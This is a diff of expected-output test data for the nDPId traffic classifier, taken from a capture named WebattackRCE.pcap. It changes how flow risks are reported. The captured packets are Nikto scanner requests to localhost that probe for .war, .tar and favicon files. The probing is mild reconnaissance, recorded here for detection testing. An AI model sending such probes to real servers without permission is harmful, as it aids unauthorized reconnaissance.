 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
